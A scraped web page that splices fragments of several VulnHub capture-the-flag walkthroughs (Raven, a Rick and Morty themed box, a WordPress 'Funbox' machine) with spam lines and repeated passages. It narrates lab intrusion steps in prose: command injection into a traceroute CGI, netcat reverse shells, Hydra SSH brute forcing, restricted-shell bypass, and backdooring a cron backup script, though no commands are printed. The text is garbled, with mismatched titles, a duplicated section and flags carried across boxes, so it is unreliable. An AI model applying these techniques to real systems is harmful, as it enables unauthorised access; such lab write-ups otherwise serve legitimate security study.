Prime: 1 Vulnhub Walkthrough September 7, 2019 February 11, 2021 by Raj Chandel Prime writeup- our other CTF challenges for CTF players and it can be download from vulnhub from here. Vulnhub Raven 1 Walkthrough. Intro: Raven 1 is listed as a beginner/intermediate CTF box on Vulnhub. I would classify it more as beginner but it. Welcome to the walkthrough for Raven, a boot2root CTF found on VulnHub. This is the first in my VulnHub Challenge that I'm doing to keep myself sharp in my offensive skills. To be fair, I'm starting off easy and then moving on to more challenging machines. The description: 'Raven 2 is an intermediate level boot2root VM. Minecraft pocket edition pc game torrent download. There are four flags to capture. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in.
- Raven 1 Vulnhub Walkthrough
- Vulnhub Raven 1 Walkthrough 4
- Beginner Vulnhub Boxes
- Vulnhub Raven 1 Walkthrough 2
A new Boot2Root came online on VulnHub and it looked like fun. This one is themed around a cartoon show called 'Rick and Morty'.
First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration.
Before hitting the well known ports, I will inspect the interesting ones. Port 9090 is identified within the VM as being the management interface. From there I connected via HTTPS and get the first flag:
FLAG {There is no Zeus, in your face!} – 10 points
Connecting to port 13337 with netcat reveals yet another flag:
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connecting to port 60000 gave me a sort of 'fake' shell to play around with. I saw there is a file named FLAG.txt so reading that file gave me the flag.
FLAG{Flip the pickle Morty!} – 10 Points
Running Nmap with scripts (-sC flag) shows that FTP is unauthenticated. I connected to it with within my web browser.
There was a flag file inside to download:
FLAG{Whoa this is unexpected} – 10 Points
Usb to serial port driver windows 7. Moving on now to the main web app, I reviewed the source code, but there isn't much to look at. Running any spider application or just going to the common 'robots.txt' file in the web root reveals this:
Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting. It is a web application that performs traceroute on a given IP. As an obvious canidate for command injection, I inserted a semi-colon to run a seperate command. I used netcat to send myself a reverse shell:
After getting a shell I started poking around. Looking in the html directory I saw a passwords folder.
Game black untuk pc. Hitting this in the web browser to reveals the FLAG.txt.
FLAG{Yeah d- just don't do it.} – 10 Points
Also worth note is the passwords.html file. Looking at it doesn't tell much, but if when I viewed the source, I saw a password hidden in the HTML comments.
At this point I came to find that the 'cat' command was aliased to some command that just printed a picture of a cat. To read files still, I just used grep command that would pretty much match on anything:
Raven 1 Vulnhub Walkthrough
Running this command I could see all the users on the system.
Knowing the password I found was 'winter', I figured this belonged to Summer. Port 22222 was running OpenSSH so I used that to connect with the 'Summer' user account.
Once logged in as Summer, I saw another FLAG.txt waiting for me.
Vulnhub Raven 1 Walkthrough 4
FLAG{Get off the high road Summer!} – 10 Points
Summer also had read access on some other user's home directories.
Morty had several interesting files in his home directory. I exfiled them off with SCP.
Safe_Password.jpg was an image file, but viewing the EXIF data or simply running strings on the file shows that a password is contained inside.
I also pulled down the journal.txt.zip file.
Unzipping the file and supplying the password gave me the journal.txt file:
Reading this file gave me the next flag, and a password.
FLAG: {131333} – 20 Points
When looking in Rick's home folder, I could see his safe.
Summer does not have execute permissions on the 'safe' file and does not own it, but she does have read permissions. I copied it to gain control.
Running the binary and supplying the password file gave me the next flag.
FLAG{And Awwwaaaaayyyy we Go!} – 20 Points
I was also given a password hint for Rick's password. I don't watch the TV show, but a quick Google search found that the band name was 'The Flesh Curtains'.
I worte a simple python script to create all the different possible passwords given the constraints:
Beginner Vulnhub Boxes
After running this script an saving the output to a file, I used THC Hydra to brute force SSH.
Once I found the valid password, I connected to Rick's account.
I ran sudo -l to enumerate his permissions:
Rick had sudo permissions for ALL commands, so I just popped into an interactive root shell:
In the /root/ directory, there was another FLAG.txt.
FLAG: {Ionic Defibrillator} – 30 points
At this point I was root and had collected all 130 points.
Walkthrough
IP of the target : 192.168.1.13
As usual I started with nmap scan to find open ports and services using the command show below :
Port 21/FTP , 22/SSH , 80/HTTP and 3306/mysql are open, anonymous login is not allowed for FTP so lets move forward on port 80, opening it in browser gives an error 'funbox.fritz.box's server IP address could not be found.' So I solved this problem by editing the /etc/hostsfile as:
Now I can access the web application and by looking at the theme I was sure that this is 'Just another wordpress website', so I started enumeration using wpscan.
So I have two usernames, next step is to bruteforce the password against these users using the wordlist rockyou.txt.
Vulnhub Raven 1 Walkthrough 2
That's it, we found the password of admin user, we can login into admin panel and from there we can pop a reverse shell as user www-data, but wait, here I thought to use these credentials for SSH login and yes I was in as user joe.
umm that's nice , now I started enumerating different directories but I was unable to change directory and cd /homecommand gives me an error -rbash: cd: restrictedand we have many ways to bypass this.
After some enumeration I found interesting file in /home/funny/ directory.
This message clearly means that .backup.sh is running as user funny, So in the next step I simply edited the .backup.sh file with a reverse shell.
After waiting for some time I got access to funny user's shell, after some more enumeration I couldn't find anything to get root access, So I terminated the current reverse shell and started to listen again on the same port, but this time I got shell of root user.
Listening again on same port:
And here is the actual catch of this machine.
NOTE : .backup.sh file is running as cronjob, and after gaining root access , I checked the cronjob for both the users ( funny and root) and found this thing:
This is for user funny:
For user root:
In the /root/ directory, there was another FLAG.txt.
FLAG: {Ionic Defibrillator} – 30 points
At this point I was root and had collected all 130 points.
Walkthrough
IP of the target : 192.168.1.13
As usual I started with nmap scan to find open ports and services using the command show below :
Port 21/FTP , 22/SSH , 80/HTTP and 3306/mysql are open, anonymous login is not allowed for FTP so lets move forward on port 80, opening it in browser gives an error 'funbox.fritz.box's server IP address could not be found.' So I solved this problem by editing the /etc/hostsfile as:
Now I can access the web application and by looking at the theme I was sure that this is 'Just another wordpress website', so I started enumeration using wpscan.
So I have two usernames, next step is to bruteforce the password against these users using the wordlist rockyou.txt.
Vulnhub Raven 1 Walkthrough 2
That's it, we found the password of admin user, we can login into admin panel and from there we can pop a reverse shell as user www-data, but wait, here I thought to use these credentials for SSH login and yes I was in as user joe.
umm that's nice , now I started enumerating different directories but I was unable to change directory and cd /homecommand gives me an error -rbash: cd: restrictedand we have many ways to bypass this.
After some enumeration I found interesting file in /home/funny/ directory.
This message clearly means that .backup.sh is running as user funny, So in the next step I simply edited the .backup.sh file with a reverse shell.
After waiting for some time I got access to funny user's shell, after some more enumeration I couldn't find anything to get root access, So I terminated the current reverse shell and started to listen again on the same port, but this time I got shell of root user.
Listening again on same port:
And here is the actual catch of this machine.
NOTE : .backup.sh file is running as cronjob, and after gaining root access , I checked the cronjob for both the users ( funny and root) and found this thing:
This is for user funny:
For user root:
So that's the reason I got root shell by listening on the same port after some time . I hope you like the walkthrough :)
NOTE: The awesome artwork used in this article was created by Anton Fritsler.